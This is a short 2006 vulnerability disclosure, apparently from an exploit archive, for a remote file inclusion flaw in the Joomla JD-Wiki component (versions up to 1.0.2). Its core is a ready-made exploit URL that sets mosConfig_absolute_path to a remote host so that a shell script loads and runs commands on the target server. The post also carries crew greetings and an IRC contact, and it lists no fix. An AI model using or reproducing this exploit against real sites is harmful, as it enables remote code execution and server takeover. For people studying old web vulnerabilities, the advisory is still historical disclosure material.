Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability

2006-08-07 00:00:00

####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters

#

Fixes

No fixes

In order to submit a new fix you need to be registered.